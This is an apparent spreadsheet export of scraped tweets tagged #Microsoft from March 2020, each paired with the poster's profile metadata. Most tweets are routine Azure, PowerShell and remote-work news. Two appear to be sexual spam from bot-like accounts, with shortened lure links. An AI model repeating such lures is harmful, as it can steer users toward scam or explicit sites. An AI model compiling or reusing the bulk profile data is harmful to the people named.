  <si>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18:31:36 +0000 2020</t>
  </si>
  <si>
    <t>Make me be your bitch. 
 #wuhan #microsoft https://t.co/KHq1i8bLGk</t>
  </si>
  <si>
    <t>{'id': 1235379562005123072, 'id_str': '1235379562005123072', 'name': 'Tamara Batie', 'screen_name': 'plesaqcrysas', 'location': 'Springfield, USA', 'description': 'Love sayings on images', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 27, 'listed_count': 0, 'created_at': 'Thu Mar 05 01:40:25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'http://pbs.twimg.com/profile_images/1235380265146609666/STdHzuyH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235380265146609666/STdHzuyH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235379562005123072/1583372694',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</si>
  <si>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18:30:46 +0000 2020</t>
  </si>
  <si>
    <t>Join us for SmarshCONNECT 2020 in NYC on 6/11/2020
#Smarsh #Slack #Nuclei #CellTrust #Facebook #Cisco #Microsoft #Umony #ATT #VZW #Tmobile #rogers
https://t.co/KpUQlFSJ4p</t>
  </si>
  <si>
    <t>{'id': 152829300, 'id_str': '152829300', 'name': 'Jeff Shaw', 'screen_name': 'civicfield', 'location': '#Phoenix, #AZ', 'description': '#MAGA #USA #ASU  #ArizonaState #Mobile #MobileSecurity #CyberSecurity #Archiving #Smarsh #Slack #Teams #Workplace #LinkedIn #Chatter #eMail', 'url': 'https://t.co/UY0oDTt7je', 'entities': {'url': {'urls': [{'url': 'https://t.co/UY0oDTt7je', 'expanded_url': 'https://www.linkedin.com/in/jeffshaw2/', 'display_url': 'linkedin.com/in/jeffshaw2/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6801, 'friends_count': 6516, 'listed_count': 17, 'created_at': 'Mon Jun 07 00:28:44 +0000 2010', 'favourites_count': 3028, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1688,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'http://pbs.twimg.com/profile_images/1170094222852132865/DXvpurqc_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1170094222852132865/DXvpurqc_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/152829300/1574889812', 'profile_link_color': '1B95E0',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</si>
  <si>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18:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft asks employees in US to work from home until March 25 amid coronavirus threat.... #UnitedStates #Coronavirus #Microsoft #Seattle #California #SanFrancisco #CoronavirusOutbreak #COVID19 #COVID19 #COVID19US https://t.co/OrSB520hNJ</t>
  </si>
  <si>
    <t>Thu Mar 05 18:29:15 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A.11) B.  1000000000 bytes
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join guys
@abha_mishra19 @ShilpiVarshne15 @Tanu7069 @Gurdeep0003 @surindersuri99 @shail2810</t>
  </si>
  <si>
    <t>Thu Mar 05 18:28:28 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A10.) C.  7
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
Join guys
@Tanu7069 @Gurdeep0003 @satyapaljain_86 @Soniyaskjain1 @surindersuri99 @ShilpiVarshne15 @shail2810</t>
  </si>
  <si>
    <t>Thu Mar 05 18:27:24 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2 https://t.co/s73mahfiiS #Microsoft #Azure</t>
  </si>
  <si>
    <t>These powerful data modeling tools for 2020 are well worth watching throughout the year. Here's what to know about these tools. #microsoft https://t.co/swiwFAYNeR https://t.co/fH0zU2naSN</t>
  </si>
  <si>
    <t>Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections https://t.co/zJD0VkHNgB #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Mar 05 18:27:23 +0000 2020</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch https://t.co/YDYMgzFupx #Microsoft #Azure</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available  https://t.co/gdOwTHZUWp #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Mar 05 18:27:22 +0000 2020</t>
  </si>
  <si>
    <t>Automatic instance repairs for Azure virtual machine scale sets now in preview https://t.co/Bor8tWbQ4i #Microsoft #Azure</t>
  </si>
  <si>
    <t>Thu Mar 05 18:27:18 +0000 2020</t>
  </si>
  <si>
    <t>@99_pvt A.9) C. Interface
#99jobs #quizcontest #ContestIndia #ITquiz  #contest #Microsoft
@Tanu7069 @Gurdeep0003 @surindersuri99 @ShilpiVarshne15 @shail2810 @satyapaljain_86 @Soniyaskjain1</t>
  </si>
  <si>
    <t>Thu Mar 05 18:26:41 +0000 2020</t>
  </si>
  <si>
    <t>If #remotework ever needed a kick to become mainstream,  #coronavirus must be it. With major companies announcing WFH policies this week and now #Google &amp;amp; #Microsoft offering free access to their remote collaboration tools, how many people stick with it after things get better?</t>
  </si>
  <si>
    <t>{'id': 4317339193, 'id_str': '4317339193', 'name': 'Kay Singh', 'screen_name': 'singhkays', 'location': 'Seattle, WA', 'description': 'Product @OracleCloud | Previously #Microsoft @Azure | Founder @CloudChangelog | Passions: hiking, travel, photography, @manutd, podcast addict @ 2x, âˆž learner', 'url': 'https://t.co/j9GQ0mmu8P', 'entities': {'url': {'urls': [{'url': 'https://t.co/j9GQ0mmu8P', 'expanded_url': 'https://www.singhkays.com', 'display_url': 'singhkays.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 274, 'friends_count': 444, 'listed_count': 12, 'created_at': 'Sun Nov 22 00:09:09 +0000 2015', 'favourites_count': 292, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 829,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'http://pbs.twimg.com/profile_images/1234744376183508993/qIz4JgBl_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234744376183508993/qIz4JgBl_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4317339193/1512839378',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</si>
  <si>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18:25:58 +0000 2020</t>
  </si>
  <si>
    <t>Thu Mar 05 18:25:12 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Upgrade the TLS version of your Power BI application to TLS 1.2 https://t.co/Bgkepr0j03 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 2318607846, 'id_str': '2318607846', 'name': 'Bovi RÃ©my', 'screen_name': 'RemyBovi', 'location': 'France - ENTRESSEN', 'description': '[MVP Azure] Senior Consultant / Team Leader / Speaker - Expert on #Microsoft Technologies #Azure', 'url': 'https://t.co/sKlvrLchKf', 'entities': {'url': {'urls': [{'url': 'https://t.co/sKlvrLchKf', 'expanded_url': 'http://www.inzecloud.com/', 'display_url': 'inzecloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 482, 'friends_count': 351, 'listed_count': 118, 'created_at': 'Thu Jan 30 09:49:16 +0000 2014', 'favourites_count': 911, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6992,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'http://pbs.twimg.com/profile_images/1090910348624965633/zXbwpY0i_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1090910348624965633/zXbwpY0i_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2318607846/1546533938',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</si>
  <si>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18:24:39 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2  https://t.co/F6RkxzzfuX  #azure #microsoft</t>
  </si>
  <si>
    <t>{'id': 7044292, 'id_str': '7044292', 'name': 'James', 'screen_name': '_wyldstallyns_', 'location': 'San Antonio, Tx', 'description': 'Dad, husband, geek. Tweets are my own.', 'url': 'https://t.co/Z0S8NzXaMz', 'entities': {'url': {'urls': [{'url': 'https://t.co/Z0S8NzXaMz', 'expanded_url': 'http://soundcloud.com/wyld-stallyns', 'display_url': 'soundcloud.com/wyld-stallyns', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 480, 'friends_count': 674, 'listed_count': 20, 'created_at': 'Sun Jun 24 04:38:09 +0000 2007', 'favourites_count': 31, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18073,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'http://pbs.twimg.com/profile_images/867002630140289024/F7DwG4zr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/867002630140289024/F7DwG4zr_normal.jpg', 'profile_link_color': '2FC2EF', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': 'FAF9FC', 'profile_text_color': 'F00934', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:24:07 +0000 2020</t>
  </si>
  <si>
    <t>Go to the site (link to bio) new sex video with a vibrator #Hayward   #actor #microsoft https://t.co/hOiHBIVvmM</t>
  </si>
  <si>
    <t>{'id': 1235594358000402433, 'id_str': '1235594358000402433', 'name': 'Sarah Harper', 'screen_name': 'gurenreafing', 'location': 'Billings, USA', 'description': 'Love sayings on images', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2, 'friends_count': 17, 'listed_count': 0, 'created_at': 'Thu Mar 05 15:53:59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'http://pbs.twimg.com/profile_images/1235611005729869827/XoVMBPzX_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235611005729869827/XoVMBPzX_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1235594358000402433/1583427625',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</si>
  <si>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18:23:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Releases #PowerToys  v0.15.0 - Fixing Nearly 100 Issues
Notably, you no longer need to run PowerToys as an admin. MS said its goal for this version was "infrastructure, quality, stability and work toward getting a way to auto-update PowerToys."
https://t.co/wxfv685iC8 https://t.co/Q63Zt50JOY</t>
  </si>
  <si>
    <t>{'id': 272005814, 'id_str': '272005814', 'name': 'Benjamin Carr, Ph.D. ðŸŸðŸžï¸ðŸ§¬ðŸ‘¨ðŸ»\u200dðŸ’»ðŸŒŠðŸ•ðŸ“·', 'screen_name': 'BenjaminHCCarr', 'location': 'Washington, DC', 'description': '#Ecology &amp; #BioInfo #Scientist now doing Sci. #HPC\nFormer @NOAA @mitseagrant @AAAS @NSFGK12 @whoi @ael_osu @nyseagrant\nPhD:@BU_GRS UG:@CornellCALS\nTweets my own', 'url': 'https://t.co/yivBlqV86R', 'entities': {'url': {'urls': [{'url': 'https://t.co/yivBlqV86R', 'expanded_url': 'https://www.linkedin.com/in/bencarr/', 'display_url': 'linkedin.com/in/bencarr/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 924, 'friends_count': 1776, 'listed_count': 274, 'created_at': 'Fri Mar 25 16:35:58 +0000 2011', 'favourites_count': 1502, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24579,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'http://pbs.twimg.com/profile_images/1477942244/headshot_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1477942244/headshot_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/272005814/1521858619',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</si>
  <si>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18:15:35 +0000 2020</t>
  </si>
  <si>
    <t>The geng in me, having spent an entire week exploring Azure #DevOps and didn't break na-da.
Up next, #PowerApps
#Microsoft https://t.co/zqTF6kulds</t>
  </si>
  <si>
    <t>{'id': 267162873, 'id_str': '267162873', 'name': 'Olayinka Oladele', 'screen_name': 'eYinka', 'location': 'Lagos, Nigeria', 'description': 'Front-end saucerer Â»\nA huge fan of good vibes Â»\nOutside the box ðŸ“¤ Â»\ncurrSpeaking: Javascript, PHP (via Laravel).', 'url': 'https://t.co/CufHzxChyH', 'entities': {'url': {'urls': [{'url': 'https://t.co/CufHzxChyH', 'expanded_url': 'https://www.linkedin.com/in/eyinka', 'display_url': 'linkedin.com/in/eyinka', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1246, 'friends_count': 656, 'listed_count': 18, 'created_at': 'Wed Mar 16 12:48:07 +0000 2011', 'favourites_count': 2108, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 19032, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'DFDFDF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1224848061165338632/Yrc9AeR__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224848061165338632/Yrc9AeR__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/267162873/1533748297', 'profile_link_color': '003333', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'CCCCCC', 'profile_text_color': '0099FF', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Mar 05 18:15:23 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2  https://t.co/2qqfVutOyI  #Azure #Microsoft #Cloud #azureflashnews</t>
  </si>
  <si>
    <t>Thu Mar 05 18:14:37 +0000 2020</t>
  </si>
  <si>
    <t>Check this out, Lakunzo will setup, configure and migrate your emails to #Office365 on @fiverr for $25
#fiverrgigs #Microsoft #Serverless
#Outlook #MicrosoftTeams 
@BitTitan @CodeTwoSoftware
@zyllio
https://t.co/bb8sHE2tzt</t>
  </si>
  <si>
    <t>{'id': 382876919, 'id_str': '382876919', 'name': 'Olakunzo', 'screen_name': 'ollydepo002', 'location': 'Abuja, Nigeria', 'description': 'An IT Specialist by profession, but a Nigerian to the heart.', 'url': 'https://t.co/xF9dii6kGm', 'entities': {'url': {'urls': [{'url': 'https://t.co/xF9dii6kGm', 'expanded_url': 'https://www.fiverr.com/lakunzo', 'display_url': 'fiverr.com/lakunzo', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 270, 'friends_count': 424, 'listed_count': 1, 'created_at': 'Fri Sep 30 21:08:56 +0000 2011', 'favourites_count': 243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1421,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'http://pbs.twimg.com/profile_images/494577081636757504/ROe6Llom_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/494577081636757504/ROe6Llom_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/382876919/1376659071', 'profile_link_color': '98B300',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</si>
  <si>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18:14:25 +0000 2020</t>
  </si>
  <si>
    <t>Interactive Yammer Emails in Outlook on the web are here! #Microsoft  https://t.co/1XqUQSovTd</t>
  </si>
  <si>
    <t>Thu Mar 05 18:12:29 +0000 2020</t>
  </si>
  <si>
    <t>Join us in DCI's high tech labs throughout Connecticut! Work on cool projects and earn credentials that employers want! #coding #careergoals #Technology #Cybersecurity #Programming #CompTIA #Cisco #Microsoft #jobs... https://t.co/Dr9MJLqjuN</t>
  </si>
  <si>
    <t>{'id': 746350637982617600, 'id_str': '746350637982617600', 'name': 'The Learning Academy', 'screen_name': 'DCI_Academy', 'location': 'Connecticut, USA', 'description': 'Hi-Tech Classrooms in #Hamden, #Bridgeport, #Waterbury, and #Hartford, #Connecticut. Free IT training for young adults in CT, application in link below!', 'url': 'https://t.co/fhZ3dsweLu', 'entities': {'url': {'urls': [{'url': 'https://t.co/fhZ3dsweLu', 'expanded_url': 'http://www.dciresourcesllc.com', 'display_url': 'dciresourcesllc.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1432, 'friends_count': 4802, 'listed_count': 42, 'created_at': 'Fri Jun 24 14:33:53 +0000 2016', 'favourites_count': 55216, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16767,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'http://pbs.twimg.com/profile_images/746351162086014977/8opao5eR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/746351162086014977/8opao5eR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/746350637982617600/1466779026',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</si>
  <si>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18:11:19 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Azure Update: Upgrade the TLS version of your Power BI application to TLS 1.2 https://t.co/hzN5Pw9KBj</t>
  </si>
  <si>
    <t>{'id': 438185663, 'id_str': '438185663', 'name': 'Marco Obinu', 'screen_name': 'OmegaMadLab', 'location': 'Arenzano, Liguria', 'description': 'Curious by nature, in love with technology (especially Azure and SQL Server), trying to survive between sons, work and hobbies. Advisory Engineer in @SoftjamIT', 'url': 'https://t.co/gXa0TcXkSe', 'entities': {'url': {'urls': [{'url': 'https://t.co/gXa0TcXkSe', 'expanded_url': 'http://www.omegamadlab.com', 'display_url': 'omegamadlab.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 189, 'friends_count': 282, 'listed_count': 5, 'created_at': 'Fri Dec 16 08:44:53 +0000 2011', 'favourites_count': 2680, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2517,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'http://pbs.twimg.com/profile_images/1189267824767844353/3I4IaW6t_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189267824767844353/3I4IaW6t_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/438185663/1572339806',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</si>
  <si>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18:11:00 +0000 2020</t>
  </si>
  <si>
    <t>#Opensource, cross-platform and people seem to like it: #PowerShell 7 has landed
Who are you and what have you done with #Microsoft?  The Register https://t.co/22ZevvZQM8</t>
  </si>
  <si>
    <t>Thu Mar 05 18:10:25 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/32T3duiVDl new #YouTube video  #videogames #XboxOne. #ApexLegends #CallofDutyModernWarfare #ApexLegendsseason4 #CallofDuty #FPS #Wargaming #XboxSeriesX #Microsoft #xboxclips #XboxShare #YouTubeGiveUsOurViews #YouTuber #youtubechannel #youtubevideos</t>
  </si>
  <si>
    <t>{'id': 492577265, 'id_str': '492577265', 'name': 'xboxwolfpackgaming', 'screen_name': 'thedeadlysoul', 'location': 'STL', 'description': 'Add me on Xbox GT: thedeadlysoul1\n\njoin my club on xbox xboxwolfpackgaming community', 'url': 'https://t.co/VWhvHBMdL5', 'entities': {'url': {'urls': [{'url': 'https://t.co/VWhvHBMdL5', 'expanded_url': 'https://www.youtube.com/channel/UC_xFHj9oiJbr1VuByJ9Y07A?view_as=subscriber', 'display_url': 'youtube.com/channel/UC_xFHâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 12, 'friends_count': 14, 'listed_count': 0, 'created_at': 'Tue Feb 14 21:48:03 +0000 2012', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1224033864739442690/ye3sG58M_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224033864739442690/ye3sG58M_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/492577265/1580667447',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</si>
  <si>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18:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Is Microsoft 365 right for you? #Microsoft #Microsoft365 https://t.co/eSJlzsqOvu</t>
  </si>
  <si>
    <t>{'id': 478750064, 'id_str': '478750064', 'name': 'Pendello Solutions', 'screen_name': 'Pendello', 'location': 'Overland Park, KS', 'description': 'The fastest-growing #ITsupport provider in #KC for small/medium-sized businesses. We remove inefficiencies to enrich the #businesses and lives of our clients.', 'url': 'http://t.co/1sJmWbQH1u', 'entities': {'url': {'urls': [{'url': 'http://t.co/1sJmWbQH1u', 'expanded_url': 'http://www.pendello.com', 'display_url': 'pendello.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 295, 'friends_count': 410, 'listed_count': 37, 'created_at': 'Mon Jan 30 16:36:22 +0000 2012', 'favourites_count': 173, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3385,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'http://pbs.twimg.com/profile_images/708293882472083456/jkRk6wia_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/708293882472083456/jkRk6wia_normal.jpg', 'profile_link_color': 'ABC251',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</si>
  <si>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New IDC report shows big opportunities to transform higher education through Artificial Intelligence   https://t.co/E93VUB81qd #Microsoft #ai #ArtificialIntelligence #MachineLearning #education #edutech https://t.co/AD7e2ZM3uP</t>
  </si>
  <si>
    <t>{'id': 228040559, 'id_str': '228040559', 'name': 'Nige Willson', 'screen_name': 'nigewillson', 'location': 'ringwood, uk', 'description': 'Global Influencer &amp; Advisor on #ArtificialIntelligence, #Innovation &amp; #Technology (Ranked amongst top 20 AI Influencers in the World) ex Microsoft European #CTO', 'url': 'https://t.co/eQiAlb6jqN', 'entities': {'url': {'urls': [{'url': 'https://t.co/eQiAlb6jqN', 'expanded_url': 'http://www.awakenai.org', 'display_url': 'awakenai.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 55590, 'friends_count': 49393, 'listed_count': 1692, 'created_at': 'Sat Dec 18 15:00:12 +0000 2010', 'favourites_count': 42345, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 52321,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'http://pbs.twimg.com/profile_images/1085251590997622784/x9mWVQ1d_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1085251590997622784/x9mWVQ1d_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/228040559/1569944291',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</si>
  <si>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18:09:07 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2 https://t.co/NySde7SDOS  #Microsoft #Azure #AzureUpdates</t>
  </si>
  <si>
    <t>{'id': 416033787, 'id_str': '416033787', 'name': 'â˜ CHARBEL NEMNOMðŸ‡¨ðŸ‡­MVP â˜', 'screen_name': 'CHARBELNEMNOM', 'location': 'Switzerland', 'description': 'Cloud Architect @itnetX_CH, ICT Security Expert and proud #Microsoft #Azure #MVP and #CDM. Speaker, blogger, and author. Azure, Azure Stack and Automation.', 'url': 'https://t.co/QHkZo2zvqS', 'entities': {'url': {'urls': [{'url': 'https://t.co/QHkZo2zvqS', 'expanded_url': 'https://charbelnemnom.com/', 'display_url': 'charbelnemnom.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2938, 'friends_count': 3382, 'listed_count': 153, 'created_at': 'Sat Nov 19 04:28:56 +0000 2011', 'favourites_count': 16187, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7572,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'http://pbs.twimg.com/profile_images/1006984649602686976/C1FKZI9E_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1006984649602686976/C1FKZI9E_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/416033787/1571816259',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</si>
  <si>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18:07:13 +0000 2020</t>
  </si>
  <si>
    <t>#PowerShell 7 released, now Generally Available
https://t.co/bJrqDUSR1r #Microsoft #Windows #Windows10 #WindowsPowershell #Dev https://t.co/8GnUj2ahDl</t>
  </si>
  <si>
    <t>Thu Mar 05 18:06:07 +0000 2020</t>
  </si>
  <si>
    <t>Welcome to https://t.co/x4r3VQl3gd Where there's plenty of great deals going on! #Microsoft Software#Technology#Electronics#Gaming Devices#XboxOne https://t.co/aCoqiWfpej</t>
  </si>
  <si>
    <t>{'id': 1196904126191263745, 'id_str': '1196904126191263745', 'name': 'Our Dream Store', 'screen_name': 'OurDreamStore1', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 76, 'friends_count': 2631, 'listed_count': 0, 'created_at': 'Tue Nov 19 21:32:43 +0000 2019', 'favourites_count': 15,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'http://pbs.twimg.com/profile_images/1217578089766457344/oONBdJTC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1217578089766457344/oONBdJTC_normal.jpg',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</si>
  <si>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18:05:25 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "Boost employee productivity with Citrix Workspace microapps: " https://t.co/8hVBSnx87J
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Thu Mar 05 18:05:16 +0000 2020</t>
  </si>
  <si>
    <t>Google Cloud Careens Into Mobile Operator Landscape https://t.co/GcpRY1eXaa #5g #ai #at&amp;amp;amp;t #breakingnews #cloud #cloudservices #edgecomputing #google #machinelearning #managedservices #microsoft #opensource #topnews</t>
  </si>
  <si>
    <t>{'id': 409551566, 'id_str': '409551566', 'name': 'SDxTech', 'screen_name': 'sdxtech', 'location': 'Denver, CO', 'description': 'Sharing job opportunities, news &amp; technology updates for network virtualization, OpenFlow, etc for CCIEs, JNCIEs, and SEs, TMEs and Network Architects #SDN #NFV', 'url': 'https://t.co/lhJfV6ww1Z', 'entities': {'url': {'urls': [{'url': 'https://t.co/lhJfV6ww1Z', 'expanded_url': 'http://www.sdxcentral.com', 'display_url': 'sdxcentral.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 39361, 'friends_count': 608, 'listed_count': 1164, 'created_at': 'Thu Nov 10 22:14:08 +0000 2011', 'favourites_count': 240, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 43590, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFAF3F', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1169727944744267776/NFV6srbY_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169727944744267776/NFV6srbY_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/409551566/1567719850', 'profile_link_color': '1378B7',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</si>
  <si>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18:05:01 +0000 2020</t>
  </si>
  <si>
    <t>WonderLaura: Mover migration now available worldwide https://t.co/GY6hvJNZgA #SharePoint #Microsoft #Office365 https://t.co/61jRNDDK0p</t>
  </si>
  <si>
    <t>{'id': 1671231374, 'id_str': '1671231374', 'name': 'Ron Schindler', 'screen_name': 'UTRonSchindler', 'location': 'Utah, USA', 'description': 'Ron Schindler -Consultant #Microsoft365, #SharePoint #Pluralsight Author, #Father, Grandfather. #LDS #Japanese Speaker, #Asia #Foodie #Travel', 'url': 'https://t.co/kcNBWLyk1A', 'entities': {'url': {'urls': [{'url': 'https://t.co/kcNBWLyk1A', 'expanded_url': 'http://www.RonSchindler.com', 'display_url': 'RonSchindler.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5645, 'friends_count': 6196, 'listed_count': 746, 'created_at': 'Wed Aug 14 19:05:29 +0000 2013', 'favourites_count': 2730, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 87394,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'http://pbs.twimg.com/profile_images/925434762222866435/7bMZz2sx_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/925434762222866435/7bMZz2sx_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1671231374/1573836916', 'profile_link_color': '85144B',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</si>
  <si>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18:04:12 +0000 2020</t>
  </si>
  <si>
    <t>Now Available Azure Stack Hub Hotfix 1.1910.24.108 https://t.co/AmTbWnVrbd  #Microsoft #AzureStack</t>
  </si>
  <si>
    <t>Thu Mar 05 18:04:09 +0000 2020</t>
  </si>
  <si>
    <t>Upgrade the TLS version of your Power BI application to TLS 1.2: https://t.co/2gII1tQA6v #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 18:04:08 +0000 2020</t>
  </si>
  <si>
    <t>Azure SQL Database managed instance now enforces TLS 1.2 on outbound connections: https://t.co/bC1gNpGs8n #Azure #Microsoft</t>
  </si>
  <si>
    <t>Azure Site Recovery mobility service automated deployment using JetPatch: https://t.co/NyTidBnDcR #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 18:04:07 +0000 2020</t>
  </si>
  <si>
    <t>Azure IoT Python SDK v2New improvements are now available: https://t.co/LNhoD0oTTf #Azure #Microsoft</t>
  </si>
  <si>
    <t>Thu Mar 05 18:03:35 +0000 2020</t>
  </si>
  <si>
    <t>Get your #intranet organised with our useful tips in our blog post: https://t.co/mGApFUjjvw 
#betterintranet #internalcomms #HR #IT #sharepoint #microsoft #office365 #digitalworkplace</t>
  </si>
  <si>
    <t>Thu Mar 05 18:03:20 +0000 2020</t>
  </si>
  <si>
    <t>Exactly one week ago the #HitachiSolutions team was in attendance at @Microsoft's Envision Forum. Here are a few snapshots from the day. #Microsoft #MSEnvisionForum https://t.co/vHNBkUf0F3</t>
  </si>
  <si>
